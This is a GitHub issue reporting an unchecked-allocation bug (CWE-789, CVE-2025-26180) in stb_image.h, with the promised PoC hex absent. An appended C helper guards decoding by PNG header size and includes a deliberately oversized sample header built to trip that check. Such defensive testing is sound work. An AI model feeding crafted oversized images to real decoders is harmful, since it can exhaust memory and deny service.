Bug: Memory Allocation with Excessive Size Value detected (stb_image.h 2.30) #1757

Open
eastmean0 opened this issue Mar 16, 2025 · 0 comments

Comments

@eastmean0

In stb_image.h, the *stbi__malloc function doesn't check the allocation size. ASan detected a CWE-789 bug.

Below is the hex value of the PoC file.


MITRE assigned a CVE for this bug (CVE-2025-26180).
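As an added example (not part of the issue and not stb_image code), a caller-side mitigation for the CWE-789 class reported above: read the PNG IHDR dimensions yourself and refuse to decode when the pixel buffer would exceed a memory budget. The helper name `png_decoded_bytes`, the budget value, and both sample headers are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Big-endian 32-bit read, as used by PNG chunk fields. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Hypothetical helper: returns a conservative decoded-pixel byte count for
 * the PNG in buf, or 0 if the header is malformed or exceeds max_bytes.
 * The IHDR CRC is not verified here. */
uint64_t png_decoded_bytes(const uint8_t *buf, size_t len, uint64_t max_bytes) {
    static const uint8_t sig[8] = {0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'};
    if (len < 33 || memcmp(buf, sig, 8) != 0) return 0;
    if (be32(buf + 8) != 13 || memcmp(buf + 12, "IHDR", 4) != 0) return 0;
    uint32_t w = be32(buf + 16), h = be32(buf + 20);
    uint8_t depth = buf[24], color = buf[25];
    unsigned channels;
    switch (color) {
    case 0: channels = 1; break;  /* greyscale */
    case 2: channels = 3; break;  /* RGB */
    case 3: channels = 4; break;  /* palette: budget for expansion to RGBA */
    case 4: channels = 2; break;  /* greyscale + alpha */
    case 6: channels = 4; break;  /* RGBA */
    default: return 0;
    }
    if (depth != 1 && depth != 2 && depth != 4 && depth != 8 && depth != 16) return 0;
    if (w == 0 || h == 0 || w > 0x7fffffffu || h > 0x7fffffffu) return 0;
    /* Whole bytes per sample (sub-byte depths count as 1). w < 2^31 and at
     * most 8 bytes per pixel, so row < 2^34; dividing guards the row*h step. */
    uint64_t row = (uint64_t)w * channels * (depth == 16 ? 2u : 1u);
    if (row > max_bytes / h) return 0;
    return row * h;
}

/* Constructed samples: signature + IHDR only, CRC bytes zeroed. */
const uint8_t SAMPLE_OK[33] = {      /* 64 x 64, 8-bit RGBA */
    0x89,'P','N','G','\r','\n',0x1a,'\n', 0,0,0,13, 'I','H','D','R',
    0,0,0,64, 0,0,0,64, 8,6,0,0,0, 0,0,0,0};
const uint8_t SAMPLE_HUGE[33] = {    /* 64 x 16777215, 16-bit RGBA */
    0x89,'P','N','G','\r','\n',0x1a,'\n', 0,0,0,13, 'I','H','D','R',
    0,0,0,64, 0,0xff,0xff,0xff, 16,6,0,0,0, 0,0,0,0};
```

Run it on untrusted input before `stbi_load_from_memory` and skip decoding when it returns 0.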
